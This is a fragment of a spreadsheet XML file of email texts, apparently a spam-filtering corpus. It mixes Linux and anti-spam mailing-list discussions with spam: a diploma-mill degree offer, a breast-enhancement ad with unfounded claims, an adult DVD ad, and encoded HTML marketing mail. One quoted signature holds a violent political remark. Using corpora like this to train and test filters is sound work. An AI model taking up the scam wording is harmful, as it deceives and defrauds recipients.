 &gt;on how to do this ;-) It must be quite simple to get the system mtime for
 &gt;the directory, it's the ordering that scares me a bit more.
 &gt;
 &gt;Attached is the current code (please keep in mind that I'm not a
 &gt;programmer, it usually explains a lot ;-)).
 &gt;
 &gt;Matthias
 &gt;
 &gt;
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Why marching is crucial
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8278079,215/
 Date: 2002-09-26T14:43:59+01:00
 *Comment:* The success of the mass demonstrations against the Vietnam war show 
 why this Saturday's Stop the War march is so important, says *Paul Foot*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] TMDA (WAS --&gt; slashdot EW Dijkstra humor]
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;You could also change your e-mail to a more responsible provider. If 
 &gt;Eircom
 &gt;are not up to scratch, then use somebody else and make sure you let 
 &gt;Eircom
 &gt;know why you think they are so useless. You can still keep your old 
 &gt;e-mail
 &gt;address if you have to.
 Since have done thanks, unfortunately Eircom 
 have a severe case of 'selective hearing'. It 
 seems that customer comments are only appreciated 
 when they are positive. When I was complaining
 they also decided that I wasn't a paying 
 subscription customer but an Indigo GoFree one 
 and that if I didn't use Windows that there was 
 obviously something wrong with me (I mean who's
 ever heard of Linux?).
 &gt;To suggest that ISP's should not protect themselves against 
 &gt;incompotent
 &gt;configurations would effectively be a vote in support of SPAM.
 True, I apologise for that. It was just the way
 in which Eircom (didn't) deal with the ORBS problem.
 Regards,
 Shane
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: No more need for a lift or support bra!1903
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 1996.  
 Increase  your bust by 1 to 3 sizes within 30-60 days 
 and be all natural.  
 Click here:
 http://www.freehostchina.com/ultrabust/cablebox2002/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mailto:standardoptout@x263.net?Subject=REMOVE
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Prevent Work Monotony ilug
</t>
  </si>
  <si>
    <t xml:space="preserve">YOUR DEGREE MAY BE CLOSER THAN YOU THINK
 We remove the obstacles that cause adults to abandon hope.
 DID YOU KNOW that you could earn your legitimate Associate's, Bachelor's, Master's or even Doctorate degree, utilizing your already existing professional or academic expertise? 
 Prepare for the professional advancement you deserve
 If you are an adult with a high school diploma and have a minimum of three years of experience in the field you are seeking a degree in, YOU QUALIFY.
 As you know, employers continually hire, promote and give raises to new employees that have ZERO skills or experience, just because they have that piece of paper.
 Take part in the wealth now!   Within days you can apply for that unreachable job, or show your degree to your employer and demand the raise and promotion that your knowledge and skills deserve.
 How does this work?  You graduate without attending classes, or taking a leave of absence from your current job.  You receive you degree based on life and work experience!
 The degree earned by our students enables them to qualify for career advancement and personal growth, while breaking down the wall that prevents them from receiving big money.
 Degree verification and official transcripts will be provided in writing when requested by employers and others authorized by the graduate. Our college &amp; University transcripts meet the highest academic standards. Our University issues a degree printed on premium diploma paper, bearing an official gold raised college seal.
 No one is turned down.
 Confidentiality assured.
 CALL 1-602-230-4252
 Call 24 hours a day, 7 days a week, including
 Sundays and holidays.
 To be taken off our list reply with off as the subject.+K{Rǫ[X_x001f_z_x001b_m_x000c_ )ffX)ߣ_x0007_˛ب)ߢ*'f֢+--z{
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I'd prefer to strip HTML tags from everything, but last time I tried
 &gt; that it still had bad effects on the error rates in my corpora
 Your corpora are biased in this respect though -- newsgroups have a
 strong social taboo on posting HTML, but in many people's personal
 inboxes it is quite abundant.
 Getting a good ham corpus may prove to be a bigger hurdle than I
 though!  My own saved mail doesn't reflect what I receive, since I
 save and throw away selectively (much more so than in the past :-).
 &gt; &gt;   multipart/mixed
 &gt; &gt;       text/plain        (brief text plus URL(s))
 &gt; &gt;       text/html         (long HTML copied from website)
 &gt; 
 &gt; Ah!  That explains why the HTML tags didn't get stripped.  I'd again
 &gt; offer to add an optional argument to tokenize() so that they'd get
 &gt; stripped here too, but if it gets glossed over a third time that
 &gt; would feel too much like a loss &lt;wink&gt;.
 I'll bite.  Sounds like a good idea to strip the HTML in this case;
 I'd like to see how this improves the f-p rate on this corpus.
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 21 Jul 2002 14:20:42 +1200
 Mark Derricutt &lt;mark@talios.com&gt; wrote:
 &gt; I found the following mentioned on a news.gnome.org usenet posting. 
 &gt; I've not yet tried it thou.  AFAIK this is just the gnome2 rpms, but
 &gt; there ximian's, don't know what else is on the apt repository either,
 &gt; must take a look around.
 &gt; 
 &gt; Mark
 &gt; 
 &gt; # Gnome2 - mentioned on news.gnome.org
 &gt; rpm http://apt.sunnmore.net/ gnome2 gnome2
 &gt; rpm-src http://apt.sunnmore.net/ gnome2 gnome2
 &gt; 
 &gt; On Sun, 2002-07-21 at 14:15, Brian Fahrlander wrote:
 &gt; &gt; On 20 Jul 2002 17:17:59 -0500, Chris Weyl &lt;cweyl@mindspring.com&gt; wrote:
 &gt; &gt; 
 &gt; &gt; &gt; Just a quick question....  does anyone know of a public Ximian apt/rpm
 &gt; &gt; &gt; repository?
 &gt; &gt; &gt; 
 &gt; &gt; &gt; (I know, I know....  but some ppl kinda like it:-))
 &gt; &gt; 
 &gt; &gt;     Yeah, I'm one of them.  Ximian, if it could be installed from Apt would be sweet- the graphics are done very, very well.  The usability is actually higher than most other environments.  But their installer really sucks.
 &gt; &gt; 
 &gt; &gt;     If you find/setup one (and figure out how to install it) let me know.
 &gt; &gt; 
 &gt; &gt; ------------------------------------------------------------------------
 &gt; &gt; Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 &gt; &gt; Evansville, IN                    My Voyage: http://www.CounterMoon.com
 &gt; &gt; ICQ  5119262
 &gt; &gt; ------------------------------------------------------------------------
 &gt; &gt; I don't want to hear news from Isreal until the news contains the words
 &gt; &gt; "Bullet", "Brain", and "Arafat".
 &gt; &gt; 
 &gt; &gt; _______________________________________________
 &gt; &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; &gt; 
 &gt; 
 &gt; 
 Would be very nice indeed but the server doesent work for me :\
 cant connect to the server! anyone else got a hint?
 thanks,
 che
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 18 Sep 2002, Tom wrote:
 &gt; The others are on mailing list only status for now. A few of the
 &gt; groups I was in that are run by others are harder to deal with since
 &gt; many folks just dont want to have to deal with the inconvienence of a
 &gt; understanding.
 I've terminated a number of my own mailing lists at yahoogroups many
 months ago because of similiar sentiments. I've tried lobbying other
 people to move, but with about zero success.
 I've got currently only one own mailing list there, which I'm going to
 move as soon as it is technically possible (which is my ISP's problem,
 basically). After that, I intend to kick yahoogroups for good.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] ffs
</t>
  </si>
  <si>
    <t xml:space="preserve">has anyone got information on enabling ffs support in
 the kernel, i was looking around, and information on
 the subject seems to be sparse. 
 http://digital.yahoo.com.au - Yahoo! Digital How To
 - Get the best out of your PC!
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] gargnome &amp; sawfish..
</t>
  </si>
  <si>
    <t xml:space="preserve"> I decided to try out GarGnome, to see what gnome2 looks like. It's
 pretty, I'll give it that.
  However, there seemed to be loads of bugs - sawfish threw wobblers all
 over the place, so I tryed out metacity - which doesn't have a GUI
 configurator, and arsed if I'm going back to the fvwm days when you had to
 set settings by hand, without an idea what the values looked like.
  So, I went back to 1.4 - and now sawfish can't start applets (yes, I did
 change the LD_LIBRARY_PATH back) and the panel can't make new workspaces.
  Any ideas what could have happened ? Would sawfish 2.0 silently change
 the config files &amp; break them?
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Attention  Instant Internet Business 1848qgMTl8
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A6_48E31A8D.D6335E14
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PCEtLSBzYXZlZCBmcm9tIHVybD0oMDAyMilodHRwOi8vaW50ZXJuZXQuZS1t
 YWlsIC0tPg0KDQoNCg0KPCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0Mv
 L0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFsLy9FTiI+DQoNCjxodG1sPg0K
 PGhlYWQ+DQoJPHRpdGxlPklNUE9SVEFOVCBVUERBVEU8L3RpdGxlPg0KPC9o
 ZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSIxMjczQ0IiIHRleHQ9IjAwMDAwIiBs
 aW5rPSIwMDAwY2MiIHZsaW5rPSJjYzAwY2MiIGFsaW5rPSJjYzAwMDAiIHRv
 cG1hcmdpbj0iMCIgbGVmdG1hcmdpbj0iMCIgYm90dG9tbWFyZ2luPSIwIiBy
 aWdodG1hcmdpbj0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBtYXJnaW53aWR0aD0i
 MCI+DQo8YnI+DQo8Y2VudGVyPjxhIGhyZWY9Imh0dHA6Ly93d3cuYnVzaW5l
 c3NvcHAyMDAyLmNvbS9jYXNobWFjaGluZTQvIj48aW1nIHNyYz0iaHR0cDov
 L3d3dy5idXNpbmVzc29wcDIwMDIuY29tL2ltYWdlcy9CTTZ0b3AuanBnIiB3
 aWR0aD0iNTAwIiBoZWlnaHQ9IjEzNiIgYWx0PSIiIGJvcmRlcj0iMCI+PC9h
 PjwvY2VudGVyPg0KPHRhYmxlIGJvcmRlcj0wIGNlbGxwYWRkaW5nPTAgY2Vs
 bHNwYWNpbmc9MCBhbGlnbj0iY2VudGVyIj48dHI+DQoJPHRkIHdpZHRoPTEg
 Ymdjb2xvcj0iMDAwMDAwIj48aW1nIHNyYz0iaHR0cDovL3d3dy5idXNpbmVz
 c29wcDIwMDIuY29tL2ltYWdlcy9hLmdpZiIgd2lkdGg9MSBoZWlnaHQ9MSBi
 b3JkZXI9MCBhbHQ9IiI+PC90ZD4NCgk8dGQgd2lkdGg9NDk4IGJnY29sb3I9
 ImZmZmZmZiI+DQoJCTx0YWJsZSBib3JkZXI9MCBjZWxscGFkZGluZz0wIGNl
 bGxzcGFjaW5nPTAgYWxpZ249ImNlbnRlciIgd2lkdGg9IjEwMCUiPjx0cj4J
 CQkNCgkJCTx0ZCBhbGlnbj0iY2VudGVyIj48dGFibGUgYm9yZGVyPTAgY2Vs
 bHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIHdpZHRoPSIxMDAlIiBoZWlnaHQ9
 MTUwPg0KCQkJCTx0cj48dGQ+PGltZyBzcmM9Imh0dHA6Ly93d3cuYnVzaW5l
 c3NvcHAyMDAyLmNvbS9pbWFnZXMvYS5naWYiIHdpZHRoPTggaGVpZ2h0PTEg
 Ym9yZGVyPTAgYWx0PSIiPjwvdGQ+DQoJCQkJCTx0ZD48YSBocmVmPSJodHRw
 Oi8vd3d3LmJ1c2luZXNzb3BwMjAwMi5jb20vY2FzaG1hY2hpbmU0LyI+PGlt
 ZyBzcmM9Imh0dHA6Ly93d3cuYnVzaW5lc3NvcHAyMDAyLmNvbS9pbWFnZXMv
 Qk1hcnJvdy5naWYiIGFsdD0iIiB3aWR0aD0iMzIiIGhlaWdodD0iMzIiIGJv
 cmRlcj0iMCI+PC9hPjwvdGQ+PHRkPiZuYnNwOzwvdGQ+DQoJCQkJCTx0ZD48
 YSBocmVmPSJodHRwOi8vd3d3LmJ1c2luZXNzb3BwMjAwMi5jb20vY2FzaG1h
 Y2hpbmU0LyI+PGltZyBzcmM9Imh0dHA6Ly93d3cuYnVzaW5lc3NvcHAyMDAy
 LmNvbS9pbWFnZXMvdGV4dDFfZmZmZmZmLmdpZiIgd2lkdGg9IjI3NiIgaGVp
 Z2h0PSIxOSIgYWx0PSIiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJPHRy
 Pjx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy5idXNpbmVzc29wcDIwMDIuY29t
 L2ltYWdlcy9hLmdpZiIgd2lkdGg9OCBoZWlnaHQ9MSBib3JkZXI9MCBhbHQ9
 IiI+PC90ZD4NCgkJCQkJPHRkPjxhIGhyZWY9Imh0dHA6Ly93d3cuYnVzaW5l
 c3NvcHAyMDAyLmNvbS9jYXNobWFjaGluZTQvIj48aW1nIHNyYz0iaHR0cDov
 L3d3dy5idXNpbmVzc29wcDIwMDIuY29tL2ltYWdlcy9CTWFycm93LmdpZiIg
 YWx0PSIiIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgYm9yZGVyPSIwIj48L2E+
 PC90ZD48dGQ+Jm5ic3A7PC90ZD4NCgkJCQkJPHRkPjxhIGhyZWY9Imh0dHA6
 Ly93d3cuYnVzaW5lc3NvcHAyMDAyLmNvbS9jYXNobWFjaGluZTQvIj48aW1n
 IHNyYz0iaHR0cDovL3d3dy5idXNpbmVzc29wcDIwMDIuY29tL2ltYWdlcy90
 ZXh0Ml9mZmZmZmYuZ2lmIiB3aWR0aD0iMTU2IiBoZWlnaHQ9IjIwIiBhbHQ9
 IiIgYm9yZGVyPSIwIj48L2E+PC90ZD4NCgkJCQk8dHI+PHRkPjxpbWcgc3Jj
 PSJodHRwOi8vd3d3LmJ1c2luZXNzb3BwMjAwMi5jb20vaW1hZ2VzL2EuZ2lm
 IiB3aWR0aD04IGhlaWdodD0xIGJvcmRlcj0wIGFsdD0iIj48L3RkPg0KCQkJ
 CQk8dGQ+PGEgaHJlZj0iaHR0cDovL3d3dy5idXNpbmVzc29wcDIwMDIuY29t
 L2Nhc2htYWNoaW5lNC8iPjxpbWcgc3JjPSJodHRwOi8vd3d3LmJ1c2luZXNz
 b3BwMjAwMi5jb20vaW1hZ2VzL0JNYXJyb3cuZ2lmIiBhbHQ9IiIgd2lkdGg9
 IjMyIiBoZWlnaHQ9IjMyIiBib3JkZXI9IjAiPjwvYT48L3RkPjx0ZD4mbmJz
 cDs8L3RkPg0KCQkJCQk8dGQ+PGEgaHJlZj0iaHR0cDovL3d3dy5idXNpbmVz
 c29wcDIwMDIuY29tL2Nhc2htYWNoaW5lNC8iPjxpbWcgc3JjPSJodHRwOi8v
 d3d3LmJ1c2luZXNzb3BwMjAwMi5jb20vaW1hZ2VzL3RleHQzX2ZmZmZmZi5n
 aWYiIHdpZHRoPSIyNTciIGhlaWdodD0iMjAiIGFsdD0iIiBib3JkZXI9IjAi
 PjwvYT48L3RkPg0KCQkJCTx0cj48dGQ+PGltZyBzcmM9Imh0dHA6Ly93d3cu
 YnVzaW5lc3NvcHAyMDAyLmNvbS9pbWFnZXMvYS5naWYiIHdpZHRoPTggaGVp
 Z2h0PTEgYm9yZGVyPTAgYWx0PSIiPjwvdGQ+DQoJCQkJCTx0ZD48YSBocmVm
 PSJodHRwOi8vd3d3LmJ1c2luZXNzb3BwMjAwMi5jb20vY2FzaG1hY2hpbmU0
 LyI+PGltZyBzcmM9Imh0dHA6Ly93d3cuYnVzaW5lc3NvcHAyMDAyLmNvbS9p
 bWFnZXMvQk1hcnJvdy5naWYiIGFsdD0iIiB3aWR0aD0iMzIiIGhlaWdodD0i
 MzIiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+PHRkPiZuYnNwOzwvdGQ+DQoJCQkJ
 CTx0ZD48YSBocmVmPSJodHRwOi8vd3d3LmJ1c2luZXNzb3BwMjAwMi5jb20v
 Y2FzaG1hY2hpbmU0LyI+PGltZyBzcmM9Imh0dHA6Ly93d3cuYnVzaW5lc3Nv
 cHAyMDAyLmNvbS9pbWFnZXMvdGV4dDRfZmZmZmZmLmdpZiIgd2lkdGg9IjE5
 MSIgaGVpZ2h0PSIxOCIgYWx0PSIiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJ
 CQk8L3RhYmxlPjwvdGQ+DQoJCQk8dGQgYWxpZ249ImNlbnRlciI+PGEgaHJl
 Zj0iaHR0cDovL3d3dy5idXNpbmVzc29wcDIwMDIuY29tL2Nhc2htYWNoaW5l
 NC8iPjxpbWcgc3JjPSJodHRwOi8vd3d3LmJ1c2luZXNzb3BwMjAwMi5jb20v
 aW1hZ2VzL0JNYW5pbWF0ZWQuZ2lmIiB3aWR0aD0iMTUzIiBoZWlnaHQ9IjE1
 MCIgYWx0PSIiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCTwvdHI+PC90YWJs
 ZT4JCQkNCgkJPHRhYmxlIGJvcmRlcj0wIGNlbGxwYWRkaW5nPTAgY2VsbHNw
 YWNpbmc9MCB3aWR0aD0iMTAwJSI+DQoJCQk8dGQ+PGltZyBzcmM9Imh0dHA6
 Ly93d3cuYnVzaW5lc3NvcHAyMDAyLmNvbS9pbWFnZXMvYS5naWYiIHdpZHRo
 PTggaGVpZ2h0PTEgYm9yZGVyPTAgYWx0PSIiPjwvdGQ+DQoJCQk8dGQ+PGEg
 aHJlZj0iaHR0cDovL3d3dy5idXNpbmVzc29wcDIwMDIuY29tL2Nhc2htYWNo
 aW5lNC8iPjxpbWcgc3JjPSJodHRwOi8vd3d3LmJ1c2luZXNzb3BwMjAwMi5j
 b20vaW1hZ2VzL0JNYXJyb3cuZ2lmIiBhbHQ9IiIgd2lkdGg9IjMyIiBoZWln
 aHQ9IjMyIiBib3JkZXI9IjAiPjwvYT48L3RkPjx0ZD4mbmJzcDs8L3RkPg0K
 CQkJPHRkIGFsaWduPSJjZW50ZXIiPjxhIGhyZWY9Imh0dHA6Ly93d3cuYnVz
 aW5lc3NvcHAyMDAyLmNvbS9jYXNobWFjaGluZTQvIj48aW1nIHNyYz0iaHR0
 cDovL3d3dy5idXNpbmVzc29wcDIwMDIuY29tL2ltYWdlcy90ZXh0NV9mZmZm
 ZmYuZ2lmIiB3aWR0aD0iMzE3IiBoZWlnaHQ9IjE1IiBhbHQ9IiIgYm9yZGVy
 PSIwIj48L2E+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7PC90ZD4NCgkJPC90YWJsZT4JCQkJDQoJPC90ZD4NCgk8dGQgd2lk
 dGg9MSBiZ2NvbG9yPSIwMDAwMDAiPjxpbWcgc3JjPSJodHRwOi8vd3d3LmJ1
 c2luZXNzb3BwMjAwMi5jb20vaW1hZ2VzL2EuZ2lmIiB3aWR0aD0xIGhlaWdo
 dD0xIGJvcmRlcj0wIGFsdD0iIj48L3RkPg0KPC90cj48L3RhYmxlPg0KPGNl
 bnRlcj48YSBocmVmPSJodHRwOi8vd3d3LmJ1c2luZXNzb3BwMjAwMi5jb20v
 Y2FzaG1hY2hpbmU0LyI+PGltZyBzcmM9Imh0dHA6Ly93d3cuYnVzaW5lc3Nv
 cHAyMDAyLmNvbS9pbWFnZXMvQk02Ym90dG9tLmpwZyIgd2lkdGg9IjUwMCIg
 aGVpZ2h0PSIxMjgiIGFsdD0iIiBib3JkZXI9IjAiPjwvYT48L2NlbnRlcj4N
 CjwvQ0VOVEVSPjxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgc2l6ZT0iLTEi
 PlRvIG9wdC1vdXQgb2Ygb3VyIGRhdGFiYXNlICA8YSBocmVmPSJodHRwOi8v
 d3d3LmJ1c2luZXNzb3BwMjAwMi5jb20vcmVtb3ZlLmh0bSIgc3R5bGU9ImNv
 bG9yOiBBcXVhOyI+Q0xJQ0sgSEVSRTwvZm9udD48L2E+PC9kaXY+DQo8YnI+
 DQo8L2JvZHk+DQo8L2h0bWw+DQo8Zm9udCBjb2xvcj0iV2hpdGUiPg0KZmF0
 aGVyMzU4NnhTeUczLTA0OWJhR2EzNDU4RGRwSjAtNzM4VEtOWjMzNjBHcmtD
 OS0yNTBZZ3NJODQybDUxDQo2NDI2Z1BqSTItMzU0S3VHazg0ODdibWRUMC0w
 ODlsaVBMNTkyM3R1VUk3LTE3NWlOc0k0NTExa3FwcTEtMDIwa0t6Uzk3OTRY
 Zm9obDcyDQo=
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 --]AA Meetings the Hottest Place to Meet Women With Big Bucks
 And, as always, you can take a page out of Fight Club and start showing up
 at all sorts of support groups. Look what it did for Marla and Jack...
 "JACK You can't have *both* parasites. You take blood parasites and --
 MARLA I want brain parasites.
 She opens another dryer and does the same thing again. PG 19
 JACK Okay. I'll take blood parasites and I'll take organic brain dementia
 and --
 MARLA I want that.
 JACK You can't have the whole brain!
 MARLA So far, you have four and I have two!
 JACK Well, then, take blood  parasites. Now, we each have three.
 MARLA So, we each have three -- that's six. What  about the seventh day? I
 want ascending bowel cancer.
 JACK *I* want ascending bowel cancer.
 MARLA That's your favorite, too? Tried to slip it by me, huh?
 JACK We'll split it. You get it the first and third Sunday of the month.
 MARLA Deal."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] many vs one
</t>
  </si>
  <si>
    <t xml:space="preserve">First, 1,000 people will have seen the piece of spam that could've been avoided.  But the other 99,000 will never see that spam.  Evenly distributed, it means that an average user will only see 1% of spam.  That's not realistic, because not everyone will get the same spam, but the basic threshold can be adjusted.  At the very least, 30 people need to "vote" on a given piece of mail to make a realistic decision.  Since there's no "no" vote mechanism (except revocation--and that's after the fact), only a "yes" vote mechanism exists and so if you received 30 "yes" votes then you could safely say that you got a reasonable sample.
 The system could pretend to have never seen the piece of mail until after it determined that it was probably spam.  So instead of a rating going up incrementally, it would take a big leap at the beginning (from undefined to a relatively high number) and then go from there.  So after the first group of people (our samplers, we'll say) have seen the spam, no one else would ever see it.
 As far as unsubscribing, I'm always leery of clicking on the link (and don't do so unless I specifically remember signing up for something), but the sample population will decide for themselves whether they feel that it's spam.
 So ultimately, I guess I'm saying that the most effective route would be to use a constantly changing sample pool and just accept that there is some fraction of users that will have to see the spam.  In a system that depends on people deciding whether or not something is spam, is there any other way?
 Isaac
 -----Original Message-----
 From: Patrick
 Sent: Wednesday, August 14, 2002 2:13 PM
 To: Oates, Isaac
 Cc: razor-users@example.sourceforge.net
 Subject: Re: [Razor-users] many vs one
 On Wed, 14 Aug 2002, Oates, Isaac wrote:
 &gt; I'm new to razor but have studied trust systems before.  I've been following
 &gt; the threads about TeS and have a few thoughts.
 &gt;
 &gt; First, a more complex algorithm is not always better.  As soon as you start
 &gt; accounting for edge cases in what should otherwise be a generalized
 &gt; algorithm, general performance begins to degrade exponentially.  The
 &gt; thing that razor should have going for it is numbers.  Say that razor
 &gt; has 100,000 people that actively use it (i.e. click the "Spam" button on
 &gt; their mail reader from time to time.)  If we decide that our objective
 &gt; is to screen 99.0% of spam, it means that we can continue to show what
 &gt; appears to be a piece of spam to 1,000 people and still meet our
 &gt; objective.
 &gt;
 &gt; Why not just wait for 1,000 people to vote that a piece of mail is indeed
 &gt; spam before ever acknowledging that it could potentially be spam?  In
 &gt; other words, when I razor-report a message, should I be able to tell
 &gt; that razor has ever even seen that message?
 Because you then have a system that is ineffective to a varying degree. A
 simplistic view would be that 999 subscribers received a piece of spam
 that could have otherwise been avoided. But the reality is likely that
 many, many more individuals would have received the piece of spam when you
 factor in report times.
 &gt; By having the server pretend to never have seen it, you can avoid
 &gt; people who just re-report spam because it was already marked as spam,
 &gt; something that is completely useless.
 Wrong. razor-check will tell you if a specific piece of mail matches
 something already in the database. If you have the system pretend to have
 never seen a piece of mail, how do you propose people use the system for
 filtering?
 &gt; What about revocations?  A revocation is after the fact because a
 &gt;  substantial number of people (1,000, in this example) have already
 &gt; decided that they do not want that message.  If it is marked as spam by
 &gt; all those people, and then people start revoking it, what does that
 &gt; mean?
 &gt; It means that the revokers have an opinion that probably doesn't mesh
 &gt; with the majority;
 No, it means that the people doing the revoking have a different opinion
 than the 1000 people who have submitted it as spam. Rather the 1000 people
 who have reported the message as spam constitute a majority or not is
 something that would have to be determined in the context of the
 individual message.
 &gt; instead of messing with its rating, why not just put
 &gt; it on the whitelist?  If I want that ZDNet mail, and most people think
 &gt; that ZDNet mail is just plain annoying, then why can't I whitelist it,
 &gt; instead of "arguing" with everyone about whether or not it's spam?
 You always have that ability.
 &gt; Correct me if I'm wrong, but it's not as if all mail from ZDNet will be
 &gt; banned in the future-just that one piece.  So if ZDNet were to change
 &gt; its system to make it easier to opt out, or whatever, people would hopefully
 &gt;  start unsubscribing instead of clicking the "Spam" button.
 It's my opinion that it's not my job to unsubscribe to any list that I
 haven't subscribed to, nor is it necessarily in my best interest given
 that some parties sending unwanted communications may utilize the
 unsubscribe request as a method of determining they are mailing a valid
 address.
 &gt; The inherent problem here, of course, is that someone can pretend to be
 &gt; 1,000 people and block anything they choose.  But say you still have a
 &gt; lightweight trust system built in, where when they "agree" with the
 &gt; majority (though they couldn't have known because razor hadn't
 &gt; acknowledged anything yet) then your trust rating goes up and vice
 &gt; versa.
 &gt;
 &gt; The key here is that, in order to be reliable, you need the numbers.  What
 &gt; am I missing here?
 See above.
 /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                                Patrick Greenwell
          Asking the wrong questions is the leading cause of wrong answers
 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
 -------------------------------------------------------
 This sf.net email is sponsored by: Dice - The leading online job board
 for high-tech professionals. Search and apply for tech jobs today!
 http://seeker.dice.com/seeker.epl?rel_code1
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [zzzzteana] Argh!
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;It's official, I'm a failure. Just finished listening to one of my high
 &gt;school classmates being interviewed on NPR about her new film that she
 &gt;wrote and directed, based on her recent successful book.   Do I have a
 &gt;film out? No. Do I have a successful book? No? Me, I spent nine months
 &gt;this year on the dole. Becky was off in Hollywood.
 &gt;
 &gt;I believe I'll go drown my sorrows in vanilla Coke now.
 Well, you might be successful too if Arthur Miller had been your father.  Or
 is this some other movie?
 john k
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE ADULT DVD!!! 9We-hbi
</t>
  </si>
  <si>
    <t xml:space="preserve">BUY 2 ADULT DVDs AT REGULAR PRICE AND GET A THIRD XXX DVD FOR FREE!!
 VISIT US AT http://www.hotdvds.org
 To be removed from our list, just reply to this email and type REMOVE in the subject line 6js7M_5WNea5xu3M_D7K7Oouz
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PROTECT YOUR COMPUTER,YOU NEED SYSTEMWORKS2002! 18638
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"3" cellspacing=3D"3" width=3D"469" cellpadding=3D"3" bgco=
 lor=3D"#000080"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"447"&gt;&amp;nbsp;
       &lt;table border=3D"1" width=3D"100%" bgcolor=3D"#FFFFFF" bordercolor=3D=
 "#000080"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" align=3D"center"&gt;&lt;font face=3D"Impact" size=3D=
 "4" color=3D"#CC0000"&gt;ATTENTION:
             This is a MUST for &lt;u&gt;ALL&lt;/u&gt; Computer Users!!!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"3" face=3D"Verdana"&gt;&lt;b&gt;&amp;nbsp;&lt;font=
  color=3D"#FFFFFF"&gt;*NEW
       - Special Package Deal!*&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;table border=3D"8" width=3D"100%" height=3D"86" bgcolor=3D"#FFFFFF"=
  bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;font face=3D"=
